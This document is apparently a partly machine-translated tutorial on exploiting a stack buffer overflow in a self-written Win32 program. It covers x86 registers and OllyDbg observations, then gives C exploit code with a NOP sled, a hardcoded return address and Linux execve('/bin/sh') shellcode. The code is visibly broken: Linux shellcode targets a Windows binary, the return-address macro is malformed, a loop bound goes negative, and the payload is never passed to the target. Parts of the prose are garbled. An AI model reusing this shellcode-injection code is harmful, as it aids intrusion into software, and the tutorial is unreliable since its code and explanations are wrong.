How to write exploit to the tool.
I will try to do it writing the simple programm in C.
Use the CodeBlock for creating the consol application for Win32
Open in HexWorkwhop
Open in Ollybdg and run
Make -> Run
ESP : stack
pointer 0022FF8C
EIP : instruction
pointer 00401280
EBP : base
pointer 0022FF94
Try to use the application, enter the word and run. Then loot at the registers.
ESP : stack
pointer 0022FF70
EIP : instruction
pointer 00401283
EBP : base
pointer 0022FF94
REGISTERS - components of the processor that stores data and address
Processor register
The 32-bit processor architecture present
- Ten 32-bit, and six 16-bit registers
Registers are divided into three categories:
- The main registers
- Control registers
- Segment registers
The main registers are divided into:
- Data registers - data
- Pointer registers - Indices
- Index registers - index
DATA REGISTERS - data register
For a 32-bit register used for arithmetic, logical, and others. Operations
- 32-bit registers -> EAX, EBX, ECX, EDX
- The lower register is used as a 16-bit -> AX, BX, CX, DX
- The lower registers are used as 8-bit -> AH, AL, BH, BL, CH, CL, DH, DL
AX - (premary accumulation) prevonachalnoe accumulation is used in input / output and most arifmiticheskih instructions.
BX - (base register) main index - Try Us for indexing addresses
CX - (counter regeister) Register graphs - cycles and interactive operation
DX - (data register) data register - used input / output, multiplication, division
POINTER REGISTERS - pointer registers
Registers pointers 32-bit EIP, ESP, EBP, and 16-bit registers IP, SP, BP
Three REGISTERS category SIGNS - POINTER REGISTERS:
- Instruction Pointer (IP) - the instruction pointer
16-bit register holds the IP addresses for the offset of the next instruction to be executed.
IP associated with the CS register (CS: IP) enables the full address of the current instruction in the code segment.
Segment address (offset) - start address memory segment with an offset value.
- Stack Pointer (SP) - the stack pointer
16-bit SP register provides the offset value of the stack in the stack program.
SP register associated with the SS (SS: SP) refers to the current position data and addresses in the program stack.
- Base Pointer (BP) - MAIN INDEX
16-bit BP register is mainly refers to the parameter variables passing through the code.
Address register SS combined with BP in the stack may also be combined with SI and DI as the main
Register to a special address.
INDEX REGISTER - INDEXING address (sometimes used in operations arifmiticheskih)
32-bit -> ESI, EDI
16-bit -> SI, DI
Source Index (SI) - the source code
Destination Index (DI) - the index of destination of
Enter the count of symbol exceeds the buffer - 55 symbol
We see the bufferoverflow stack
Try to write the exploit
//Exploit for target.exe
#include<process.h> //запустить
другую программу
#include<stdio.h>
#include<errno.h>
#include<stdlib.h>
#include<string.h>
#include<dos.h>
/*
Минимальный shellcode */
static
char shellcode[]=
"\xeb\x17\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d"
"\x4e\x08\x31\xd2\xcd\x80\xe8\xe4\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x58";
#define
NOP 0x90
#define
LEN 88 //lpBuffer
58h -> decimal 88
#define
RET 770F6BF4 //return address
from Ollydbg
int
main()
{
char
buffer[LEN];
long
retaddr = RET;
int
i;
fprintf(stderr,"using
address 0x%lx\n",retaddr); //fprint
выполняет форматированный вывод в поток
// stderr вывод сообщений об ошибках на
экран
/* заполяем весь буфер адресом
возврата */
for
(i=0;i<LEN;i+=4) //4
byte
*(long *)&buffer[i] = retaddr;
/* заполняет начальный буфер NOP's, 60 массив меньше чем размер
буфера,
таким образом помещается шелкод и адрес
возрата */
for
(i=0;i<(LEN-strlen(shellcode)-100);i++)
*(buffer+i) = NOP;
/*
после заполнения NOP's, копируем в execve() shellcode */
memcpy(buffer+i,shellcode,strlen(shellcode));
/*
export the variable, run */
execlp("target.exe",
NULL); //запускаем
target.exe
return
0;
}
